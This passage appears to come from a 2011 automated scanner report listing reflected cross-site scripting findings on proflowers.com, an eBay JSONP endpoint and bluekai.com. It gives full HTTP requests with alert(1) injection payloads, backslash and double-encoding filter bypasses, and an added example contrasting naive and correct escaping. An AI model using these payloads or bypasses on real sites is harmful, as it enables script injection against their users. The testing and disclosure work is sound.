resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC3f89f\\";alert(1)//1611fbaf415";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "fgvprtlsmsn_hp021111_unknown
...[SNIP]...

2.59. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66204\"%3balert(1)//2ea94e2c6c0 was submitted in the viewpos parameter. This input was echoed as 66204\\";alert(1)//2ea94e2c6c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=266204\"%3balert(1)//2ea94e2c6c0&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:38:29 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:38:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:38:29 GMT
Content-Length: 166358


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="266204\\";alert(1)//2ea94e2c6c0";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.99";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...

2.60. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the Ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 859ae\"%3balert(1)//49c0c02e430 was submitted in the Ref parameter. This input was echoed as 859ae\\";alert(1)//49c0c02e430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef859ae\"%3balert(1)//49c0c02e430&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:57:13 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:57:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:57:13 GMT
Content-Length: 161940


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ndarOnZipEntry=ReloadCalendarOnZipEntry_in;this.ShowSummaryZipPanel=ShowSummaryZipPanel_in;};this.Rows = new Array(1);this.Rows[0]=new this.Row("30007357","30007357","30007357","269248","72","HomeNoRef859ae\\";alert(1)//49c0c02e430","","PFC","1",0,"",1,"xpa-1,pfb-3,psv-4,phl-2,pfl-3,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pcy-7,poe-3,pcb-1,pjs-4,pcu-1,pvm-1,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,p
...[SNIP]...

2.61. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the trackingpgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ef8\"%3balert(1)//47481d06965 was submitted in the trackingpgroup parameter. This input was echoed as 43ef8\\";alert(1)//47481d06965 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM43ef8\"%3balert(1)//47481d06965&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:55:01 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:55:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:55:01 GMT
Content-Length: 155943


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM43ef8\\";alert(1)//47481d06965";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv12 ="";
resx.cv13 ="";
resx.cv14 = "homenoref";
resx.cv15 = "";
...[SNIP]...

2.62. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the viewpos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63910\"%3balert(1)//baa6ca69c91 was submitted in the viewpos parameter. This input was echoed as 63910\\";alert(1)//baa6ca69c91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
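Why the defense described in 2.61 and 2.62 fails, as an added example that is not part of the report and is not ProFlowers' code: a reconstruction of a quote-only escaper next to a context-correct JavaScript-string encoder, each fed the decoded trackingpgroup value from 2.61 and executed with alert() stubbed out. The emitted line (resx.cv3 = "...") copies the response above; the two escaping functions and the evaluation harness are assumptions about the server side, not the site's code.

```javascript
// Added example (not from the report, not ProFlowers code): why escaping only the
// quote character fails, and what a context-correct JavaScript-string encoder does.
// The emitted line mirrors the response in 2.61; the server-side escaping logic is
// a reconstruction, not the site's actual code.

// The trackingpgroup value as the server sees it after URL-decoding %3b -> ';'
// (constructed from the request in 2.61): HPM43ef8\";alert(1)//47481d06965
const PAYLOAD = 'HPM43ef8\\";alert(1)//47481d06965';

// The defence the report describes: backslash every double quote, nothing else.
// The attacker's own backslash is left alone, so \" becomes \\" and the string closes.
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Context-correct encoder: every character outside [A-Za-z0-9] becomes a \xHH or
// \uHHHH escape. This neutralises \ and " (the bypass here) and also < / and the
// line terminators U+2028/U+2029, so the literal can be broken neither by the
// JavaScript lexer nor by the HTML parser spotting a </script> sequence.
function jsStringEscape(s) {
  return s.replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// The line of inline script the page emits for a given encoder.
function render(encoder, value) {
  return 'resx.cv3 = "' + encoder(value) + '";\n';
}

// Execute the emitted script the way a browser would, with alert() replaced by a
// spy so we can tell whether the injected call ran and what value cv3 ended up with.
function evaluateEmitted(src) {
  const resx = {};
  let alertCalls = 0;
  new Function('resx', 'alert', src)(resx, () => { alertCalls += 1; });
  return { cv3: resx.cv3, alertCalls };
}

const naive = evaluateEmitted(render(naiveEscape, PAYLOAD));
const safe = evaluateEmitted(render(jsStringEscape, PAYLOAD));
console.log(render(naiveEscape, PAYLOAD).trim()); // resx.cv3 = "HPM43ef8\\";alert(1)//47481d06965";
console.log('naive: alert ran', naive.alertCalls, 'time(s); cv3 =', JSON.stringify(naive.cv3));
console.log('safe:  alert ran', safe.alertCalls, 'time(s); round-trips =', safe.cv3 === PAYLOAD);
```

The naive output is byte-for-byte the line in the response above: the string ends at the attacker's backslash and alert(1) is executed as a statement. With the hex encoder the same input round-trips to the original value and nothing runs. If a chain of replace() calls is used instead, the backslash must be escaped first, before the quote, or the same bypass reappears.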

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=163910\"%3balert(1)//baa6ca69c91&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:53:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:53:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:53:58 GMT
Content-Length: 157371


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.cv15 = "";
resx.cv16 ="true";

resx.cv17 ="";
resx.cv18 ="";

resx.cv19 = ""; /* revenue only pass in evar38 */
resx.cv20 = ""; /* event 10 includes c&h */
/* resx.cv21 = "" */
resx.cv22 ="163910\\";alert(1)//baa6ca69c91";
resx.cv23 = "";


resx.cv25 = "";
resx.cv26 = "";
resx.cv27= "";
resx.cv28 = "";/* check if it should be discount*/
resx.cv29 = "49.98";
resx.cv30 ="";
resx.cv31="";
resx.cv32="";
resx.c
...[SNIP]...

2.63. http://rover.ebay.com/idmap/0 [footer&cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /idmap/0

Issue detail

The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. (The scanner labels the parameter footer&cb because the query string opens with the valueless token footer; the injected value is the cb JSONP callback name.) The payload d0c65%3balert(1)//3c480ac7649 was submitted in the footer&cb parameter. This input was echoed as d0c65;alert(1)//3c480ac7649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The root cause is an unvalidated JSONP callback name: whatever is supplied in cb is written verbatim in front of the data. Two points temper the rating. The body is returned with Content-Type: text/json and no X-Content-Type-Options header, so a browser that honours the declared type does not execute it when the URL is visited directly; the injected code runs from a direct visit only where the response is content-sniffed as HTML or script (older Internet Explorer). And because the endpoint exists to be loaded through <script src>, a page that chooses to include it with a hostile cb only runs that code in its own origin. Restricting cb to a dotted-identifier pattern removes the issue.

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback0d0c65%3balert(1)//3c480ac7649&_vrdm=1297449096889 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://www.ebay.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cssg=15fccc2d12e0a02652943d14ffeea689; s=CgAD4ACBNVtG0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2ODmOKdKX; nonsession=CgADKACBWu4G0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2OGEAywABTVWHPDEf/9BP; dp1=bu1p/QEBfX0BAX19AQA**4f36b3b4^tzo/1685117e787^; lucky9=5245946; npii=btrm/svid%3D991010211714f36b3c3^tguid/15fccc2d12e0a02652943d14ffeea68a4f36b3c3^cguid/f65c9e8712d0a0aa12e4b294ff6547f14f36b3c3^; ebay=%5Ecv%3D15555%5Esbf%3D%23100000%5Ejs%3D1%5Ecos%3D53%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.1%3F17613-12e15fe4b6c
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Fri, 11 Feb 2011 18:31:50 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback0d0c65;alert(1)//3c480ac7649(["","",86400]);}catch(e){}

2.64. http://tags.bluekai.com/site/50 [phint parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the phint request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The parameter is repeated many times in the request; the injection point is the kh=... field of one of those copies, which the page lower-cases and writes into the hashID variable (the payload is already lower-case, so the folding does not disturb it). The payload 353f6%2527%253balert%25281%2529%252f%252fc16c49bef95 was submitted in the phint parameter. This input was echoed as 353f6';alert(1)//c16c49bef95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=...[SNIP]...; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=...[SNIP]...; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:06 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=4ReD5tQsbDzsHNJo; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
